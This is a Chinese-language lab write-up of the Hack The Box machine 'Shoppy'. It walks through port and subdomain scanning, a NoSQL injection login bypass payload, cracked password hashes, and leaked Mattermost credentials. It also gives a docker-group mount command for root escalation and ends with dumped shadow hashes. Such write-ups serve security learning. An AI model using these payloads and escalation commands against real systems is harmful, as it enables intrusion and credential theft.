基本信息

端口扫描

22,80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.180
Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-23 14:50 CST
Nmap scan report for 10.10.11.180
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
| 256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_ 256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.53 seconds

80

需要加hosts

1
10.10.11.180 shoppy.htb

Wait page,还没正式开放:

子域名扫描

子域名可以发现mattermost,这里对字典稍微有点要求:

1
2
3
gobuster vhost -u http://shoppy.htb -w ~/Tools/dict/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt

Found: mattermost.shoppy.htb (Status: 200) [Size: 3122]

目录扫描

简单的扫描或者常规手工枚举可以发现login:

NoSQL注入

登录那里存在注入,但不是普通sql注入,而是NoSQL注入:

1
admin'||''=='

search功能使用同样的payload搜索,结果中得到密码hash,可以解出来josh的密码:

1
2
3
[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

josh : remembermethisway

mattermost

得到的josh账号密码可以登录mattermost,在其中一个频道中得到jaeger账号密码:

1
2
username: jaeger
password: Sh0ppyBest@pp!

user flag

得到的jaeger用户ssh登录:

提权信息

上面信息可以看到是需要先到deploy用户,这个程序strings没什么有用信息,但直接cat再结合尝试运行的报错信息,能够得到密码,没错,密码就是Sample

deploy

使用密码运行程序,得到deploy的密码:

切换到deploy用户,发现当前用户在docker组中,那就是常规的docker挂载提权:

提权 & root flag

1
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

shadow

1
2
3
root:$y$j9T$0gd6YLeK1QF8eXOhAGmb2.$rvSHnH5qysjj79l0OiXizdnFwT1vsQzz5U4p/vrHQMB:19195:0:99999:7:::
jaeger:$y$j9T$Dd.LPLKhUiqLImmrThQ.m/$zWTCxncUITpaG1GhvvV66fhFWRh2CVz.KtJH4bd1ke.:19195:0:99999:7:::
deploy:$y$j9T$1u25BMNE1Y2tRYy7ne.wg/$mHEZ.4Y9kanC0001s.p5Q8qqzwt9TYgj6nrvaqDlPcB:19195:0:99999:7:::

参考资料